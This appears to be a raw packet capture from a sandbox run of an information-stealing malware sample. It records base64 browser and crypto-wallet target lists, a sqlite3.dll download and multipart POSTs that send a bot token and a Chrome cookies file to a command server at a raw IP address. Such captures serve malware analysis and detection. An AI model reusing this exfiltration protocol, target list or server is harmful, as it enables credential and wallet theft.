R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 27, 2024 04:14:04.634545088 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 27, 2024 04:14:04.694006920 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEB Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 2d 2d 0d 0a Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="message"plugins------AAEHIDAKECFIEBGDHJEB--
Sep 27, 2024 04:14:04.919199944 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 27, 2024 04:14:04.919234991 CEST	224	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
Sep 27, 2024 04:14:04.919245958 CEST	1236	IN	Data Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57 Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
Sep 27, 2024 04:14:04.919297934 CEST	1236	IN	Data Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamt
Sep 27, 2024 04:14:04.919308901 CEST	1236	IN	Data Raw: 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 Data Ascii: fDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J
Sep 27, 2024 04:14:04.919373035 CEST	672	IN	Data Raw: 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 Data Ascii: b2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1
Sep 27, 2024 04:14:04.919822931 CEST	1236	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Sep 27, 2024 04:14:04.919833899 CEST	268	IN	Data Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
Sep 27, 2024 04:14:04.921308041 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="message"fplugins------CGHDAKKJJJKJKECBGCGD--
Sep 27, 2024 04:14:05.145955086 CEST	335	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:05 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 27, 2024 04:14:05.165585041 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC Host: 185.215.113.37 Content-Length: 6627 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 04:14:05.165608883 CEST	6627	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 27, 2024 04:14:06.016439915 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:14:06.273667097 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 04:14:06.495910883 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 27, 2024 04:14:06.495937109 CEST	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 27, 2024 04:14:07.849023104 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGI Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------EBFBKFBGIIIDGDGCFCGI--
Sep 27, 2024 04:14:08.569202900 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:14:08.659063101 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file"------KEBGHCBAEGDHIDGCBAEC--
Sep 27, 2024 04:14:09.371159077 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:14:10.174793005 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; 